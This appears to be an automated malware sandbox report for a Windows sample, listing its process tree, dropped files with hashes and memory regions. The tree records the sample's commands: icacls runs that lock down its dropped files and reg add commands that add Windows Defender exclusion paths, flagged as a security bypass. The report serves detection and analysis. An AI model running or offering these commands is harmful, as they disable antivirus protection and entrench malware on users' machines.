                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\grGBKT.exe" /inheritance:r
                                              3⤵
                                              • Executes a command shell one-liner
                                              • Suspicious use of WriteProcessMemory
                                              PID:1760
                                              • C:\Windows\SysWOW64\icacls.exe
                                                icacls "C:\Program Files (x86)\grGBKT\grGBKT.exe" /inheritance:r
                                                4⤵
                                                • Possible privilege escalation attempt
                                                • Modifies file permissions
                                                • System Location Discovery: System Language Discovery
                                                PID:3044
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\grGBKT.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                              3⤵
                                              • Executes a command shell one-liner
                                              PID:5040
                                              • C:\Windows\SysWOW64\icacls.exe
                                                icacls "C:\Program Files (x86)\grGBKT\grGBKT.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                4⤵
                                                • Possible privilege escalation attempt
                                                • Modifies file permissions
                                                PID:4148
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\grGBKT.exe" /grant:r Users:(RX) /deny Users:(DE)
                                              3⤵
                                              • Executes a command shell one-liner
                                              • System Location Discovery: System Language Discovery
                                              PID:3536
                                              • C:\Windows\SysWOW64\icacls.exe
                                                icacls "C:\Program Files (x86)\grGBKT\grGBKT.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                4⤵
                                                • Possible privilege escalation attempt
                                                • Modifies file permissions
                                                • System Location Discovery: System Language Discovery
                                                PID:3768
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\image.png" /inheritance:r
                                              3⤵
                                              • Executes a command shell one-liner
                                              PID:4548
                                              • C:\Windows\SysWOW64\icacls.exe
                                                icacls "C:\Program Files (x86)\grGBKT\image.png" /inheritance:r
                                                4⤵
                                                • Possible privilege escalation attempt
                                                • Modifies file permissions
                                                • System Location Discovery: System Language Discovery
                                                PID:4924
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                              3⤵
                                              • Executes a command shell one-liner
                                              • System Location Discovery: System Language Discovery
                                              PID:3160
                                              • C:\Windows\SysWOW64\icacls.exe
                                                icacls "C:\Program Files (x86)\grGBKT\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                4⤵
                                                • Possible privilege escalation attempt
                                                • Modifies file permissions
                                                PID:2848
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                              3⤵
                                              • Executes a command shell one-liner
                                              • System Location Discovery: System Language Discovery
                                              PID:1752
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                4⤵
                                                  PID:3964
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\grGBKT\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:2480
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\thumbs.db" /inheritance:r
                                                3⤵
                                                • Executes a command shell one-liner
                                                • System Location Discovery: System Language Discovery
                                                PID:1744
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\grGBKT\thumbs.db" /inheritance:r
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4088
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                3⤵
                                                • Executes a command shell one-liner
                                                PID:2344
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\grGBKT\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2888
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                3⤵
                                                • Executes a command shell one-liner
                                                • System Location Discovery: System Language Discovery
                                                PID:2436
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\grGBKT\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4080
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\XPSPLOG.dll" /inheritance:r
                                                3⤵
                                                • Executes a command shell one-liner
                                                • System Location Discovery: System Language Discovery
                                                PID:3896
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\grGBKT\XPSPLOG.dll" /inheritance:r
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3376
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                3⤵
                                                • Executes a command shell one-liner
                                                • System Location Discovery: System Language Discovery
                                                PID:1828
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\grGBKT\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4432
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c icacls "C:\Program Files (x86)\grGBKT\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                                3⤵
                                                • Executes a command shell one-liner
                                                • System Location Discovery: System Language Discovery
                                                PID:2992
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\grGBKT\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1580
                                          • C:\Windows\system32\cmd.exe
                                            cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\U9tl3z" /t REG_DWORD /d 0 /f
                                            1⤵
                                            • Executes a command shell one-liner
                                            • Suspicious use of WriteProcessMemory
                                            PID:2752
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\U9tl3z" /t REG_DWORD /d 0 /f
                                              2⤵
                                              • Windows security bypass
                                              PID:3332
                                          • C:\Windows\system32\cmd.exe
                                            cmd.exe
                                            1⤵
                                              PID:940
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              • Suspicious use of WriteProcessMemory
                                              PID:1756
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                2⤵
                                                • Windows security bypass
                                                PID:3416
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              • Suspicious use of WriteProcessMemory
                                              PID:4144
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                2⤵
                                                • Windows security bypass
                                                PID:1384
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              • Suspicious use of WriteProcessMemory
                                              PID:884
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                2⤵
                                                • Windows security bypass
                                                PID:3324
                                            • C:\Program Files (x86)\grGBKT\grGBKT.exe
                                              "C:\Program Files (x86)\grGBKT\grGBKT.exe"
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:3964
                                            • C:\Program Files (x86)\grGBKT\grGBKT.exe
                                              "C:\Program Files (x86)\grGBKT\grGBKT.exe"
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:4804
                                            • C:\Program Files (x86)\VVOJJGR97\Tp916K.exe
                                              "C:\Program Files (x86)\VVOJJGR97\Tp916K.exe"
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:3292
                                            • C:\Windows\system32\cmd.exe
                                              cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              PID:4204
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                2⤵
                                                • Windows security bypass
                                                PID:4228
                                            • C:\Program Files (x86)\grGBKT\grGBKT.exe
                                              "C:\Program Files (x86)\grGBKT\grGBKT.exe"
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:4108
                                            • C:\Program Files (x86)\VVOJJGR97\Tp916K.exe
                                              "C:\Program Files (x86)\VVOJJGR97\Tp916K.exe"
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:5024

                                            Network

                                                  MITRE ATT&CK Enterprise v16

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  e584310.rbs

                                                  • Path C:\Config.Msi\e584310.rbs
                                                  • Size 7KB
                                                  • SHA256 e7f18696ae2fb176efa28f42bdd45d1a25b449a53e38a5ee0dbb63574146b8d8
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  XPSPLOG.dll

                                                  • Path C:\Program Files (x86)\VVOJJGR97\XPSPLOG.dll
                                                  • Size 4.6MB
                                                  • SHA256 cfdff77881253bcf1ffc410ab8e3184dfceca5dc0526c876f2469bee20a34c50
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  image.png

                                                  • Path C:\Program Files (x86)\VVOJJGR97\image.png
                                                  • Size 5.0MB
                                                  • SHA256 3f147d7df3abfbcd18b9bb27720dbeec03adcf6d4e5af37770fb6b6032f91a3f
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  XPSPLOG.dll

                                                  • Path C:\Program Files (x86)\grGBKT\XPSPLOG.dll
                                                  • Size 4.6MB
                                                  • SHA256 20de579911f261c3454e9fc8d7f15dfab88a0cf819171ddc223a3489cd21005d
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  grGBKT.exe

                                                  • Path C:\Program Files (x86)\grGBKT\grGBKT.exe
                                                  • Size 145KB
                                                  • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  image.png

                                                  • Path C:\Program Files (x86)\grGBKT\image.png
                                                  • Size 5.0MB
                                                  • SHA256 cf8d255b48d399a95a887cf5fd9040110995a27d7fed873b853811609dac8799
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  thumbs.db

                                                  • Path C:\Program Files (x86)\grGBKT\thumbs.db
                                                  • Size 358KB
                                                  • SHA256 12814f0b43c95bc30e9133209e99c20edf54274612031b5210d0da20053c48bb
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  __PSScriptPolicyTest_pokkq3qp.v5t.ps1

                                                  • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pokkq3qp.v5t.ps1
                                                  • Size 60B
                                                  • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                  • MD5 SHA1 SHA512 TLSH

                                                  destopbak.ini

                                                  • Path C:\Users\Public\Music\destopbak.ini
                                                  • Size 2B
                                                  • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                                  • MD5 SHA1 SHA512

                                                  UxEnhance64.dll

                                                  • Path C:\Users\Public\U9tl3z\UxEnhance64.dll
                                                  • Size 3.1MB
                                                  • SHA256 c4c6781cc22c15adf6ca50d8a063ebc00d27485fd841a9e832ad0d0d783227e0
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  adoresd.dat

                                                  • Path C:\Users\Public\U9tl3z\adoresd.dat
                                                  • Size 4.7MB
                                                  • SHA256 b20a4088343499c4d8e800d07d03aa4148813ccfc1e244489e3ee2f9b101c254
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  msadox.tb

                                                  • Path C:\Users\Public\U9tl3z\msadox.tb
                                                  • Size 8KB
                                                  • SHA256 324afdc0353fb6c048ac9b9592bacb2160607448d3ff45d5fd85386dbc59e7ee
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  vzalW0.exe

                                                  • Path C:\Users\Public\U9tl3z\vzalW0.exe
                                                  • Size 135KB
                                                  • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  MSI44E5.tmp

                                                  • Path C:\Windows\Installer\MSI44E5.tmp
                                                  • Size 7.5MB
                                                  • SHA256 a67b0d3ea524701352723b1b52f15b3a1cac7f953391c03ffad0c38d336c6fcd
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  e58430f.msi

                                                  • Path C:\Windows\Installer\e58430f.msi
                                                  • Size 7.6MB
                                                  • SHA256 66e8197348bfafe659d33f5851a4a47280b76dcc648f3e581ed986542a5d1033
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  metadata-2

                                                  • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                  • Size 24.1MB
                                                  • SHA256 bbcfb45f625dedea89acdecc0e025c088af67a85c07de7b3eb9314dc72c4d136
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  {ba909f8f-0b77-4a94-a30b-4a75c07ad391}_OnDiskSnapshotProp

                                                  • Path \??\Volume{0dfc9b49-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{ba909f8f-0b77-4a94-a30b-4a75c07ad391}_OnDiskSnapshotProp
                                                  • Size 6KB
                                                  • SHA256 86ab04aa073ffcfdadfd8ebb6c41d72d1bd864928e30ceb8e197742631ba1805
                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                  xxxx.ini

                                                  • Path \??\c:\xxxx.ini
                                                  • Size 2B
                                                  • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                                  • MD5 SHA1 SHA512

                                                  memory/260-282-0x0000000005690000-0x00000000056B2000-memory.dmp

                                                  memory/260-280-0x0000000002F70000-0x0000000002FA6000-memory.dmp

                                                  memory/260-292-0x0000000006050000-0x00000000063A4000-memory.dmp

                                                  memory/260-305-0x0000000007750000-0x00000000077F3000-memory.dmp

                                                  memory/260-284-0x0000000005EE0000-0x0000000005F46000-memory.dmp

                                                  memory/260-283-0x0000000005E70000-0x0000000005ED6000-memory.dmp

                                                  memory/260-306-0x0000000007EB0000-0x000000000852A000-memory.dmp

                                                  memory/260-304-0x0000000006B30000-0x0000000006B4E000-memory.dmp

                                                  memory/260-281-0x0000000005840000-0x0000000005E68000-memory.dmp

                                                  memory/260-293-0x0000000006560000-0x000000000657E000-memory.dmp

                                                  memory/260-294-0x0000000006590000-0x00000000065DC000-memory.dmp

                                                  memory/260-307-0x0000000007870000-0x000000000788A000-memory.dmp

                                                  memory/260-308-0x00000000078E0000-0x00000000078EA000-memory.dmp

                                                  memory/260-309-0x0000000007AF0000-0x0000000007B86000-memory.dmp

                                                  memory/260-310-0x0000000007A70000-0x0000000007A81000-memory.dmp

                                                  memory/260-295-0x0000000007710000-0x0000000007742000-memory.dmp

                                                  memory/260-296-0x00000000724A0000-0x00000000724EC000-memory.dmp

                                                  memory/828-85-0x000001C92B440000-0x000001C92B4CA000-memory.dmp

                                                  memory/828-76-0x000001C92A860000-0x000001C92B0F1000-memory.dmp

                                                  memory/828-83-0x000001C92B440000-0x000001C92B4CA000-memory.dmp

                                                  memory/828-81-0x000001C929DC0000-0x000001C929E0E000-memory.dmp

                                                  memory/828-82-0x000001C92B440000-0x000001C92B4CA000-memory.dmp

                                                  memory/828-84-0x000001C92B440000-0x000001C92B4CA000-memory.dmp

                                                  memory/828-71-0x000001C92A860000-0x000001C92B0F1000-memory.dmp

                                                  memory/828-72-0x000001C92A860000-0x000001C92B0F1000-memory.dmp

                                                  memory/828-89-0x000001C92A860000-0x000001C92B0F1000-memory.dmp

                                                  memory/828-70-0x000001C92A860000-0x000001C92B0F1000-memory.dmp

                                                  memory/828-64-0x00007FF9C2980000-0x00007FF9C2982000-memory.dmp

                                                  memory/828-57-0x00007FF9A31E0000-0x00007FF9A36FE000-memory.dmp

                                                  memory/828-56-0x00007FF9C2970000-0x00007FF9C2972000-memory.dmp

                                                  memory/828-62-0x000001C92A860000-0x000001C92B0F1000-memory.dmp

                                                  memory/828-65-0x000001C92A860000-0x000001C92B0F1000-memory.dmp

                                                  memory/828-69-0x000001C92A860000-0x000001C92B0F1000-memory.dmp

                                                  memory/828-92-0x000001C92A860000-0x000001C92B0F1000-memory.dmp

                                                  memory/3028-193-0x0000000003050000-0x0000000003064000-memory.dmp

                                                  memory/3028-186-0x0000000003AD0000-0x00000000042D7000-memory.dmp

                                                  memory/3028-182-0x0000000003AD0000-0x00000000042D7000-memory.dmp

                                                  memory/3028-175-0x0000000074750000-0x0000000074E9A000-memory.dmp

                                                  memory/3028-227-0x0000000003AD0000-0x00000000042D7000-memory.dmp

                                                  memory/3028-202-0x0000000010000000-0x0000000010061000-memory.dmp

                                                  memory/3028-194-0x0000000003AD0000-0x00000000042D7000-memory.dmp

                                                  memory/3028-174-0x0000000001860000-0x0000000001861000-memory.dmp

                                                  memory/3028-179-0x0000000003AD0000-0x00000000042D7000-memory.dmp

                                                  memory/3028-279-0x0000000003AD0000-0x00000000042D7000-memory.dmp

                                                  memory/3028-181-0x0000000001880000-0x0000000001881000-memory.dmp

                                                  memory/3292-272-0x0000000002F50000-0x0000000002F51000-memory.dmp

                                                  memory/3292-273-0x0000000003AE0000-0x00000000042E7000-memory.dmp

                                                  memory/3292-277-0x0000000002F30000-0x0000000002F31000-memory.dmp

                                                  memory/3292-250-0x0000000003AE0000-0x00000000042E7000-memory.dmp

                                                  memory/3292-246-0x0000000072460000-0x0000000072BAA000-memory.dmp

                                                  memory/3292-245-0x0000000002F30000-0x0000000002F31000-memory.dmp

                                                  memory/3964-229-0x0000000001470000-0x0000000001471000-memory.dmp

                                                  memory/3964-253-0x0000000003B00000-0x0000000004307000-memory.dmp

                                                  memory/3964-259-0x0000000001470000-0x0000000001471000-memory.dmp

                                                  memory/3964-239-0x0000000003B00000-0x0000000004307000-memory.dmp

                                                  memory/3964-252-0x00000000015A0000-0x00000000015A1000-memory.dmp

                                                  memory/3964-230-0x0000000074750000-0x0000000074E9A000-memory.dmp

                                                  memory/4108-329-0x0000000002EF0000-0x0000000002EF1000-memory.dmp

                                                  memory/4108-321-0x00000000039C0000-0x00000000041C7000-memory.dmp

                                                  memory/4108-317-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                                                  memory/4108-318-0x0000000074750000-0x0000000074E9A000-memory.dmp

                                                  memory/4108-330-0x00000000039C0000-0x00000000041C7000-memory.dmp

                                                  memory/4108-333-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                                                  memory/4804-264-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

                                                  memory/4804-236-0x0000000074750000-0x0000000074E9A000-memory.dmp

                                                  memory/4804-235-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

                                                  memory/4804-242-0x0000000003320000-0x0000000003B27000-memory.dmp

                                                  memory/4804-261-0x0000000003320000-0x0000000003B27000-memory.dmp

                                                  memory/4804-260-0x0000000000B10000-0x0000000000B11000-memory.dmp

                                                  memory/4820-18-0x00007FF9AEBC0000-0x00007FF9AEBD0000-memory.dmp

                                                  memory/4820-14-0x00007FF9C2970000-0x00007FF9C2972000-memory.dmp

                                                  memory/4820-15-0x00007FF9A4780000-0x00007FF9A4DBA000-memory.dmp

                                                  memory/4820-42-0x00007FF9AEBC0000-0x00007FF9AEBD0000-memory.dmp

                                                  memory/5024-324-0x0000000071BE0000-0x000000007232A000-memory.dmp

                                                  memory/5024-323-0x0000000000590000-0x0000000000591000-memory.dmp

                                                  memory/5024-327-0x0000000002CF0000-0x00000000034F7000-memory.dmp

                                                  memory/5024-335-0x0000000002CF0000-0x00000000034F7000-memory.dmp

                                                  memory/5024-334-0x00000000005B0000-0x00000000005B1000-memory.dmp

                                                  memory/5024-338-0x0000000000590000-0x0000000000591000-memory.dmp